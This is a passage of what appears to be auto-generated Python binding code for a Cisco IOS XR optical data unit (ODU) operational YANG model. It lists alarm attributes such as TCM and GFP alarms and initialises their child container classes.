**type**\: :py:class:`Tcm2SfBer <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm2SfBer>`
**config**\: False
.. attribute:: tcm2_sd_ber
TCM2 SD BER alarm
**type**\: :py:class:`Tcm2SdBer <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm2SdBer>`
**config**\: False
.. attribute:: tcm3_ais
TCM3 Alarm Indication Signal
**type**\: :py:class:`Tcm3Ais <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm3Ais>`
**config**\: False
.. attribute:: tcm3_ltc
TCM3 Loss of Tandem connection Monitoring
**type**\: :py:class:`Tcm3Ltc <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm3Ltc>`
**config**\: False
.. attribute:: tcm3_oci
TCM3 Open Connection Indiction
**type**\: :py:class:`Tcm3Oci <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm3Oci>`
**config**\: False
.. attribute:: tcm3_lck
TCM3 Upstream Connection Locked
**type**\: :py:class:`Tcm3Lck <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm3Lck>`
**config**\: False
.. attribute:: tcm3_iae
TCM3 Incoming Alignment Error
**type**\: :py:class:`Tcm3Iae <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm3Iae>`
**config**\: False
.. attribute:: tcm3_biae
TCM3 Backward Incoming Alignment Error
**type**\: :py:class:`Tcm3Biae <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm3Biae>`
**config**\: False
.. attribute:: tcm3_bdi
TCM3 Backward Defect Monitoring
**type**\: :py:class:`Tcm3Bdi <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm3Bdi>`
**config**\: False
.. attribute:: tcm3_tim
TCM3 Trail Trace Identifier Mismatch
**type**\: :py:class:`Tcm3Tim <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm3Tim>`
**config**\: False
.. attribute:: tcm3_sf_ber
TCM3 SF BER alarm
**type**\: :py:class:`Tcm3SfBer <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm3SfBer>`
**config**\: False
.. attribute:: tcm3_sd_ber
TCM3 SD BER alarm
**type**\: :py:class:`Tcm3SdBer <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm3SdBer>`
**config**\: False
.. attribute:: tcm4_ais
TCM4 Alarm Indication Signal
**type**\: :py:class:`Tcm4Ais <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm4Ais>`
**config**\: False
.. attribute:: tcm4_ltc
TCM4 Loss of Tandem connection Monitoring
**type**\: :py:class:`Tcm4Ltc <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm4Ltc>`
**config**\: False
.. attribute:: tcm4_oci
TCM4 Open Connection Indiction
**type**\: :py:class:`Tcm4Oci <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm4Oci>`
**config**\: False
.. attribute:: tcm4_lck
TCM4 Upstream Connection Locked
**type**\: :py:class:`Tcm4Lck <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm4Lck>`
**config**\: False
.. attribute:: tcm4_iae
TCM4 Incoming Alignment Error
**type**\: :py:class:`Tcm4Iae <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm4Iae>`
**config**\: False
.. attribute:: tcm4_biae
TCM4 Backward Incoming Alignment Error
**type**\: :py:class:`Tcm4Biae <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm4Biae>`
**config**\: False
.. attribute:: tcm4_bdi
TCM4 Backward Defect Monitoring
**type**\: :py:class:`Tcm4Bdi <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm4Bdi>`
**config**\: False
.. attribute:: tcm4_tim
TCM4 Trail Trace Identifier Mismatch
**type**\: :py:class:`Tcm4Tim <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm4Tim>`
**config**\: False
.. attribute:: tcm4_sf_ber
TCM4 SF BER alarm
**type**\: :py:class:`Tcm4SfBer <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm4SfBer>`
**config**\: False
.. attribute:: tcm4_sd_ber
TCM4 SD BER alarm
**type**\: :py:class:`Tcm4SdBer <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm4SdBer>`
**config**\: False
.. attribute:: tcm5_ais
TCM5 Alarm Indication Signal
**type**\: :py:class:`Tcm5Ais <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm5Ais>`
**config**\: False
.. attribute:: tcm5_ltc
TCM5 Loss of Tandem connection Monitoring
**type**\: :py:class:`Tcm5Ltc <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm5Ltc>`
**config**\: False
.. attribute:: tcm5_oci
TCM5 Open Connection Indiction
**type**\: :py:class:`Tcm5Oci <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm5Oci>`
**config**\: False
.. attribute:: tcm5_lck
TCM5 Upstream Connection Locked
**type**\: :py:class:`Tcm5Lck <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm5Lck>`
**config**\: False
.. attribute:: tcm5_iae
TCM5 Incoming Alignment Error
**type**\: :py:class:`Tcm5Iae <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm5Iae>`
**config**\: False
.. attribute:: tcm5_biae
TCM5 Backward Incoming Alignment Error
**type**\: :py:class:`Tcm5Biae <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm5Biae>`
**config**\: False
.. attribute:: tcm5_bdi
TCM5 Backward Defect Monitoring
**type**\: :py:class:`Tcm5Bdi <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm5Bdi>`
**config**\: False
.. attribute:: tcm5_tim
TCM5 Trail Trace Identifier Mismatch
**type**\: :py:class:`Tcm5Tim <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm5Tim>`
**config**\: False
.. attribute:: tcm5_sf_ber
TCM5 SF BER alarm
**type**\: :py:class:`Tcm5SfBer <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm5SfBer>`
**config**\: False
.. attribute:: tcm5_sd_ber
TCM5 SD BER alarm
**type**\: :py:class:`Tcm5SdBer <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm5SdBer>`
**config**\: False
.. attribute:: tcm6_ais
TCM6 Alarm Indication Signal
**type**\: :py:class:`Tcm6Ais <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm6Ais>`
**config**\: False
.. attribute:: tcm6_ltc
TCM6 Loss of Tandem connection Monitoring
**type**\: :py:class:`Tcm6Ltc <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm6Ltc>`
**config**\: False
.. attribute:: tcm6_oci
TCM6 Open Connection Indiction
**type**\: :py:class:`Tcm6Oci <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm6Oci>`
**config**\: False
.. attribute:: tcm6_lck
TCM6 Upstream Connection Locked
**type**\: :py:class:`Tcm6Lck <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm6Lck>`
**config**\: False
.. attribute:: tcm6_iae
TCM6 Incoming Alignment Error
**type**\: :py:class:`Tcm6Iae <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm6Iae>`
**config**\: False
.. attribute:: tcm6_biae
TCM6 Backward Incoming Alignment Error
**type**\: :py:class:`Tcm6Biae <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm6Biae>`
**config**\: False
.. attribute:: tcm6_bdi
TCM6 Backward Defect Monitoring
**type**\: :py:class:`Tcm6Bdi <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm6Bdi>`
**config**\: False
.. attribute:: tcm6_tim
TCM6 Trail Trace Identifier Mismatch
**type**\: :py:class:`Tcm6Tim <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm6Tim>`
**config**\: False
.. attribute:: tcm6_sf_ber
TCM6 SF BER alarm
**type**\: :py:class:`Tcm6SfBer <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm6SfBer>`
**config**\: False
.. attribute:: tcm6_sd_ber
TCM6 SD BER alarm
**type**\: :py:class:`Tcm6SdBer <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm6SdBer>`
**config**\: False
.. attribute:: gfp_lfd
Loss Of Frame Delineation
**type**\: :py:class:`GfpLfd <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.GfpLfd>`
**config**\: False
.. attribute:: gfp_locs
Loss Of Client Signal
**type**\: :py:class:`GfpLocs <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.GfpLocs>`
**config**\: False
.. attribute:: gfp_loccs
Loss Of Character Synchronization
**type**\: :py:class:`GfpLoccs <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.GfpLoccs>`
**config**\: False
.. attribute:: gfp_upm
User Payload Mismatch
**type**\: :py:class:`GfpUpm <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.GfpUpm>`
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm, self).__init__()
self.yang_name = "alarm"
self.yang_parent_name = "info"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("oci", ("oci", Odu.Controllers.Controller.Info.Alarm.Oci)), ("ais", ("ais", Odu.Controllers.Controller.Info.Alarm.Ais)), ("lck", ("lck", Odu.Controllers.Controller.Info.Alarm.Lck)), ("bdi", ("bdi", Odu.Controllers.Controller.Info.Alarm.Bdi)), ("eoc", ("eoc", Odu.Controllers.Controller.Info.Alarm.Eoc)), ("ptim", ("ptim", Odu.Controllers.Controller.Info.Alarm.Ptim)), ("tim", ("tim", Odu.Controllers.Controller.Info.Alarm.Tim)), ("iae", ("iae", Odu.Controllers.Controller.Info.Alarm.Iae)), ("biae", ("biae", Odu.Controllers.Controller.Info.Alarm.Biae)), ("sf-ber", ("sf_ber", Odu.Controllers.Controller.Info.Alarm.SfBer)), ("sd-ber", ("sd_ber", Odu.Controllers.Controller.Info.Alarm.SdBer)), ("csf", ("csf", Odu.Controllers.Controller.Info.Alarm.Csf)), ("tcm1-ais", ("tcm1_ais", Odu.Controllers.Controller.Info.Alarm.Tcm1Ais)), ("tcm1-ltc", ("tcm1_ltc", Odu.Controllers.Controller.Info.Alarm.Tcm1Ltc)), ("tcm1-oci", ("tcm1_oci", Odu.Controllers.Controller.Info.Alarm.Tcm1Oci)), ("tcm1-lck", ("tcm1_lck", Odu.Controllers.Controller.Info.Alarm.Tcm1Lck)), ("tcm1-iae", ("tcm1_iae", Odu.Controllers.Controller.Info.Alarm.Tcm1Iae)), ("tcm1-biae", ("tcm1_biae", Odu.Controllers.Controller.Info.Alarm.Tcm1Biae)), ("tcm1-bdi", ("tcm1_bdi", Odu.Controllers.Controller.Info.Alarm.Tcm1Bdi)), ("tcm1-tim", ("tcm1_tim", Odu.Controllers.Controller.Info.Alarm.Tcm1Tim)), ("tcm1-sf-ber", ("tcm1_sf_ber", Odu.Controllers.Controller.Info.Alarm.Tcm1SfBer)), ("tcm1-sd-ber", ("tcm1_sd_ber", Odu.Controllers.Controller.Info.Alarm.Tcm1SdBer)), ("tcm2-ais", ("tcm2_ais", Odu.Controllers.Controller.Info.Alarm.Tcm2Ais)), ("tcm2-ltc", ("tcm2_ltc", Odu.Controllers.Controller.Info.Alarm.Tcm2Ltc)), ("tcm2-oci", ("tcm2_oci", Odu.Controllers.Controller.Info.Alarm.Tcm2Oci)), ("tcm2-lck", ("tcm2_lck", Odu.Controllers.Controller.Info.Alarm.Tcm2Lck)), ("tcm2-iae", ("tcm2_iae", Odu.Controllers.Controller.Info.Alarm.Tcm2Iae)), ("tcm2-biae", ("tcm2_biae", Odu.Controllers.Controller.Info.Alarm.Tcm2Biae)), ("tcm2-bdi", ("tcm2_bdi", Odu.Controllers.Controller.Info.Alarm.Tcm2Bdi)), ("tcm2-tim", ("tcm2_tim", Odu.Controllers.Controller.Info.Alarm.Tcm2Tim)), ("tcm2-sf-ber", ("tcm2_sf_ber", Odu.Controllers.Controller.Info.Alarm.Tcm2SfBer)), ("tcm2-sd-ber", ("tcm2_sd_ber", Odu.Controllers.Controller.Info.Alarm.Tcm2SdBer)), ("tcm3-ais", ("tcm3_ais", Odu.Controllers.Controller.Info.Alarm.Tcm3Ais)), ("tcm3-ltc", ("tcm3_ltc", Odu.Controllers.Controller.Info.Alarm.Tcm3Ltc)), ("tcm3-oci", ("tcm3_oci", Odu.Controllers.Controller.Info.Alarm.Tcm3Oci)), ("tcm3-lck", ("tcm3_lck", Odu.Controllers.Controller.Info.Alarm.Tcm3Lck)), ("tcm3-iae", ("tcm3_iae", Odu.Controllers.Controller.Info.Alarm.Tcm3Iae)), ("tcm3-biae", ("tcm3_biae", Odu.Controllers.Controller.Info.Alarm.Tcm3Biae)), ("tcm3-bdi", ("tcm3_bdi", Odu.Controllers.Controller.Info.Alarm.Tcm3Bdi)), ("tcm3-tim", ("tcm3_tim", Odu.Controllers.Controller.Info.Alarm.Tcm3Tim)), ("tcm3-sf-ber", ("tcm3_sf_ber", Odu.Controllers.Controller.Info.Alarm.Tcm3SfBer)), ("tcm3-sd-ber", ("tcm3_sd_ber", Odu.Controllers.Controller.Info.Alarm.Tcm3SdBer)), ("tcm4-ais", ("tcm4_ais", Odu.Controllers.Controller.Info.Alarm.Tcm4Ais)), ("tcm4-ltc", ("tcm4_ltc", Odu.Controllers.Controller.Info.Alarm.Tcm4Ltc)), ("tcm4-oci", ("tcm4_oci", Odu.Controllers.Controller.Info.Alarm.Tcm4Oci)), ("tcm4-lck", ("tcm4_lck", Odu.Controllers.Controller.Info.Alarm.Tcm4Lck)), ("tcm4-iae", ("tcm4_iae", Odu.Controllers.Controller.Info.Alarm.Tcm4Iae)), ("tcm4-biae", ("tcm4_biae", Odu.Controllers.Controller.Info.Alarm.Tcm4Biae)), ("tcm4-bdi", ("tcm4_bdi", Odu.Controllers.Controller.Info.Alarm.Tcm4Bdi)), ("tcm4-tim", ("tcm4_tim", Odu.Controllers.Controller.Info.Alarm.Tcm4Tim)), ("tcm4-sf-ber", ("tcm4_sf_ber", Odu.Controllers.Controller.Info.Alarm.Tcm4SfBer)), ("tcm4-sd-ber", ("tcm4_sd_ber", Odu.Controllers.Controller.Info.Alarm.Tcm4SdBer)), ("tcm5-ais", ("tcm5_ais", Odu.Controllers.Controller.Info.Alarm.Tcm5Ais)), ("tcm5-ltc", ("tcm5_ltc", Odu.Controllers.Controller.Info.Alarm.Tcm5Ltc)), ("tcm5-oci", ("tcm5_oci", Odu.Controllers.Controller.Info.Alarm.Tcm5Oci)), ("tcm5-lck", ("tcm5_lck", Odu.Controllers.Controller.Info.Alarm.Tcm5Lck)), ("tcm5-iae", ("tcm5_iae", Odu.Controllers.Controller.Info.Alarm.Tcm5Iae)), ("tcm5-biae", ("tcm5_biae", Odu.Controllers.Controller.Info.Alarm.Tcm5Biae)), ("tcm5-bdi", ("tcm5_bdi", Odu.Controllers.Controller.Info.Alarm.Tcm5Bdi)), ("tcm5-tim", ("tcm5_tim", Odu.Controllers.Controller.Info.Alarm.Tcm5Tim)), ("tcm5-sf-ber", ("tcm5_sf_ber", Odu.Controllers.Controller.Info.Alarm.Tcm5SfBer)), ("tcm5-sd-ber", ("tcm5_sd_ber", Odu.Controllers.Controller.Info.Alarm.Tcm5SdBer)), ("tcm6-ais", ("tcm6_ais", Odu.Controllers.Controller.Info.Alarm.Tcm6Ais)), ("tcm6-ltc", ("tcm6_ltc", Odu.Controllers.Controller.Info.Alarm.Tcm6Ltc)), ("tcm6-oci", ("tcm6_oci", Odu.Controllers.Controller.Info.Alarm.Tcm6Oci)), ("tcm6-lck", ("tcm6_lck", Odu.Controllers.Controller.Info.Alarm.Tcm6Lck)), ("tcm6-iae", ("tcm6_iae", Odu.Controllers.Controller.Info.Alarm.Tcm6Iae)), ("tcm6-biae", ("tcm6_biae", Odu.Controllers.Controller.Info.Alarm.Tcm6Biae)), ("tcm6-bdi", ("tcm6_bdi", Odu.Controllers.Controller.Info.Alarm.Tcm6Bdi)), ("tcm6-tim", ("tcm6_tim", Odu.Controllers.Controller.Info.Alarm.Tcm6Tim)), ("tcm6-sf-ber", ("tcm6_sf_ber", Odu.Controllers.Controller.Info.Alarm.Tcm6SfBer)), ("tcm6-sd-ber", ("tcm6_sd_ber", Odu.Controllers.Controller.Info.Alarm.Tcm6SdBer)), ("gfp-lfd", ("gfp_lfd", Odu.Controllers.Controller.Info.Alarm.GfpLfd)), ("gfp-locs", ("gfp_locs", Odu.Controllers.Controller.Info.Alarm.GfpLocs)), ("gfp-loccs", ("gfp_loccs", Odu.Controllers.Controller.Info.Alarm.GfpLoccs)), ("gfp-upm", ("gfp_upm", Odu.Controllers.Controller.Info.Alarm.GfpUpm))])
self._leafs = OrderedDict()
self.oci = Odu.Controllers.Controller.Info.Alarm.Oci()
self.oci.parent = self
self._children_name_map["oci"] = "oci"
self.ais = Odu.Controllers.Controller.Info.Alarm.Ais()
self.ais.parent = self
self._children_name_map["ais"] = "ais"
self.lck = Odu.Controllers.Controller.Info.Alarm.Lck()
self.lck.parent = self
self._children_name_map["lck"] = "lck"
self.bdi = Odu.Controllers.Controller.Info.Alarm.Bdi()
self.bdi.parent = self
self._children_name_map["bdi"] = "bdi"
self.eoc = Odu.Controllers.Controller.Info.Alarm.Eoc()
self.eoc.parent = self
self._children_name_map["eoc"] = "eoc"
self.ptim = Odu.Controllers.Controller.Info.Alarm.Ptim()
self.ptim.parent = self
self._children_name_map["ptim"] = "ptim"
self.tim = Odu.Controllers.Controller.Info.Alarm.Tim()
self.tim.parent = self
self._children_name_map["tim"] = "tim"
self.iae = Odu.Controllers.Controller.Info.Alarm.Iae()
self.iae.parent = self
self._children_name_map["iae"] = "iae"
self.biae = Odu.Controllers.Controller.Info.Alarm.Biae()
self.biae.parent = self
self._children_name_map["biae"] = "biae"
self.sf_ber = Odu.Controllers.Controller.Info.Alarm.SfBer()
self.sf_ber.parent = self
self._children_name_map["sf_ber"] = "sf-ber"
self.sd_ber = Odu.Controllers.Controller.Info.Alarm.SdBer()
self.sd_ber.parent = self
self._children_name_map["sd_ber"] = "sd-ber"
self.csf = Odu.Controllers.Controller.Info.Alarm.Csf()
self.csf.parent = self
self._children_name_map["csf"] = "csf"
self.tcm1_ais = Odu.Controllers.Controller.Info.Alarm.Tcm1Ais()
self.tcm1_ais.parent = self
self._children_name_map["tcm1_ais"] = "tcm1-ais"
self.tcm1_ltc = Odu.Controllers.Controller.Info.Alarm.Tcm1Ltc()
self.tcm1_ltc.parent = self
self._children_name_map["tcm1_ltc"] = "tcm1-ltc"
self.tcm1_oci = Odu.Controllers.Controller.Info.Alarm.Tcm1Oci()
self.tcm1_oci.parent = self
self._children_name_map["tcm1_oci"] = "tcm1-oci"
self.tcm1_lck = Odu.Controllers.Controller.Info.Alarm.Tcm1Lck()
self.tcm1_lck.parent = self
self._children_name_map["tcm1_lck"] = "tcm1-lck"
self.tcm1_iae = Odu.Controllers.Controller.Info.Alarm.Tcm1Iae()
self.tcm1_iae.parent = self
self._children_name_map["tcm1_iae"] = "tcm1-iae"
self.tcm1_biae = Odu.Controllers.Controller.Info.Alarm.Tcm1Biae()
self.tcm1_biae.parent = self
self._children_name_map["tcm1_biae"] = "tcm1-biae"
self.tcm1_bdi = Odu.Controllers.Controller.Info.Alarm.Tcm1Bdi()
self.tcm1_bdi.parent = self
self._children_name_map["tcm1_bdi"] = "tcm1-bdi"
self.tcm1_tim = Odu.Controllers.Controller.Info.Alarm.Tcm1Tim()
self.tcm1_tim.parent = self
self._children_name_map["tcm1_tim"] = "tcm1-tim"
self.tcm1_sf_ber = Odu.Controllers.Controller.Info.Alarm.Tcm1SfBer()
self.tcm1_sf_ber.parent = self
self._children_name_map["tcm1_sf_ber"] = "tcm1-sf-ber"
self.tcm1_sd_ber = Odu.Controllers.Controller.Info.Alarm.Tcm1SdBer()
self.tcm1_sd_ber.parent = self
self._children_name_map["tcm1_sd_ber"] = "tcm1-sd-ber"
self.tcm2_ais = Odu.Controllers.Controller.Info.Alarm.Tcm2Ais()
self.tcm2_ais.parent = self
self._children_name_map["tcm2_ais"] = "tcm2-ais"
self.tcm2_ltc = Odu.Controllers.Controller.Info.Alarm.Tcm2Ltc()
self.tcm2_ltc.parent = self
self._children_name_map["tcm2_ltc"] = "tcm2-ltc"
self.tcm2_oci = Odu.Controllers.Controller.Info.Alarm.Tcm2Oci()
self.tcm2_oci.parent = self
self._children_name_map["tcm2_oci"] = "tcm2-oci"
self.tcm2_lck = Odu.Controllers.Controller.Info.Alarm.Tcm2Lck()
self.tcm2_lck.parent = self
self._children_name_map["tcm2_lck"] = "tcm2-lck"
self.tcm2_iae = Odu.Controllers.Controller.Info.Alarm.Tcm2Iae()
self.tcm2_iae.parent = self
self._children_name_map["tcm2_iae"] = "tcm2-iae"
self.tcm2_biae = Odu.Controllers.Controller.Info.Alarm.Tcm2Biae()
self.tcm2_biae.parent = self
self._children_name_map["tcm2_biae"] = "tcm2-biae"
self.tcm2_bdi = Odu.Controllers.Controller.Info.Alarm.Tcm2Bdi()
self.tcm2_bdi.parent = self
self._children_name_map["tcm2_bdi"] = "tcm2-bdi"
self.tcm2_tim = Odu.Controllers.Controller.Info.Alarm.Tcm2Tim()
self.tcm2_tim.parent = self
self._children_name_map["tcm2_tim"] = "tcm2-tim"
self.tcm2_sf_ber = Odu.Controllers.Controller.Info.Alarm.Tcm2SfBer()
self.tcm2_sf_ber.parent = self
self._children_name_map["tcm2_sf_ber"] = "tcm2-sf-ber"
self.tcm2_sd_ber = Odu.Controllers.Controller.Info.Alarm.Tcm2SdBer()
self.tcm2_sd_ber.parent = self
self._children_name_map["tcm2_sd_ber"] = "tcm2-sd-ber"
self.tcm3_ais = Odu.Controllers.Controller.Info.Alarm.Tcm3Ais()
self.tcm3_ais.parent = self
self._children_name_map["tcm3_ais"] = "tcm3-ais"
self.tcm3_ltc = Odu.Controllers.Controller.Info.Alarm.Tcm3Ltc()
self.tcm3_ltc.parent = self
self._children_name_map["tcm3_ltc"] = "tcm3-ltc"
self.tcm3_oci = Odu.Controllers.Controller.Info.Alarm.Tcm3Oci()
self.tcm3_oci.parent = self
self._children_name_map["tcm3_oci"] = "tcm3-oci"
self.tcm3_lck = Odu.Controllers.Controller.Info.Alarm.Tcm3Lck()
self.tcm3_lck.parent = self
self._children_name_map["tcm3_lck"] = "tcm3-lck"
self.tcm3_iae = Odu.Controllers.Controller.Info.Alarm.Tcm3Iae()
self.tcm3_iae.parent = self
self._children_name_map["tcm3_iae"] = "tcm3-iae"
self.tcm3_biae = Odu.Controllers.Controller.Info.Alarm.Tcm3Biae()
self.tcm3_biae.parent = self
self._children_name_map["tcm3_biae"] = "tcm3-biae"
self.tcm3_bdi = Odu.Controllers.Controller.Info.Alarm.Tcm3Bdi()
self.tcm3_bdi.parent = self
self._children_name_map["tcm3_bdi"] = "tcm3-bdi"
self.tcm3_tim = Odu.Controllers.Controller.Info.Alarm.Tcm3Tim()
self.tcm3_tim.parent = self
self._children_name_map["tcm3_tim"] = "tcm3-tim"
self.tcm3_sf_ber = Odu.Controllers.Controller.Info.Alarm.Tcm3SfBer()
self.tcm3_sf_ber.parent = self
self._children_name_map["tcm3_sf_ber"] = "tcm3-sf-ber"
self.tcm3_sd_ber = Odu.Controllers.Controller.Info.Alarm.Tcm3SdBer()
self.tcm3_sd_ber.parent = self
self._children_name_map["tcm3_sd_ber"] = "tcm3-sd-ber"
self.tcm4_ais = Odu.Controllers.Controller.Info.Alarm.Tcm4Ais()
self.tcm4_ais.parent = self
self._children_name_map["tcm4_ais"] = "tcm4-ais"
self.tcm4_ltc = Odu.Controllers.Controller.Info.Alarm.Tcm4Ltc()
self.tcm4_ltc.parent = self
self._children_name_map["tcm4_ltc"] = "tcm4-ltc"
self.tcm4_oci = Odu.Controllers.Controller.Info.Alarm.Tcm4Oci()
self.tcm4_oci.parent = self
self._children_name_map["tcm4_oci"] = "tcm4-oci"
self.tcm4_lck = Odu.Controllers.Controller.Info.Alarm.Tcm4Lck()
self.tcm4_lck.parent = self
self._children_name_map["tcm4_lck"] = "tcm4-lck"
self.tcm4_iae = Odu.Controllers.Controller.Info.Alarm.Tcm4Iae()
self.tcm4_iae.parent = self
self._children_name_map["tcm4_iae"] = "tcm4-iae"
self.tcm4_biae = Odu.Controllers.Controller.Info.Alarm.Tcm4Biae()
self.tcm4_biae.parent = self
self._children_name_map["tcm4_biae"] = "tcm4-biae"
self.tcm4_bdi = Odu.Controllers.Controller.Info.Alarm.Tcm4Bdi()
self.tcm4_bdi.parent = self
self._children_name_map["tcm4_bdi"] = "tcm4-bdi"
self.tcm4_tim = Odu.Controllers.Controller.Info.Alarm.Tcm4Tim()
self.tcm4_tim.parent = self
self._children_name_map["tcm4_tim"] = "tcm4-tim"
self.tcm4_sf_ber = Odu.Controllers.Controller.Info.Alarm.Tcm4SfBer()
self.tcm4_sf_ber.parent = self
self._children_name_map["tcm4_sf_ber"] = "tcm4-sf-ber"
self.tcm4_sd_ber = Odu.Controllers.Controller.Info.Alarm.Tcm4SdBer()
self.tcm4_sd_ber.parent = self
self._children_name_map["tcm4_sd_ber"] = "tcm4-sd-ber"
self.tcm5_ais = Odu.Controllers.Controller.Info.Alarm.Tcm5Ais()
self.tcm5_ais.parent = self
self._children_name_map["tcm5_ais"] = "tcm5-ais"
self.tcm5_ltc = Odu.Controllers.Controller.Info.Alarm.Tcm5Ltc()
self.tcm5_ltc.parent = self
self._children_name_map["tcm5_ltc"] = "tcm5-ltc"
self.tcm5_oci = Odu.Controllers.Controller.Info.Alarm.Tcm5Oci()
self.tcm5_oci.parent = self
self._children_name_map["tcm5_oci"] = "tcm5-oci"
self.tcm5_lck = Odu.Controllers.Controller.Info.Alarm.Tcm5Lck()
self.tcm5_lck.parent = self
self._children_name_map["tcm5_lck"] = "tcm5-lck"
self.tcm5_iae = Odu.Controllers.Controller.Info.Alarm.Tcm5Iae()
self.tcm5_iae.parent = self
self._children_name_map["tcm5_iae"] = "tcm5-iae"
self.tcm5_biae = Odu.Controllers.Controller.Info.Alarm.Tcm5Biae()
self.tcm5_biae.parent = self
self._children_name_map["tcm5_biae"] = "tcm5-biae"
self.tcm5_bdi = Odu.Controllers.Controller.Info.Alarm.Tcm5Bdi()
self.tcm5_bdi.parent = self
self._children_name_map["tcm5_bdi"] = "tcm5-bdi"
self.tcm5_tim = Odu.Controllers.Controller.Info.Alarm.Tcm5Tim()
self.tcm5_tim.parent = self
self._children_name_map["tcm5_tim"] = "tcm5-tim"
self.tcm5_sf_ber = Odu.Controllers.Controller.Info.Alarm.Tcm5SfBer()
self.tcm5_sf_ber.parent = self
self._children_name_map["tcm5_sf_ber"] = "tcm5-sf-ber"
self.tcm5_sd_ber = Odu.Controllers.Controller.Info.Alarm.Tcm5SdBer()
self.tcm5_sd_ber.parent = self
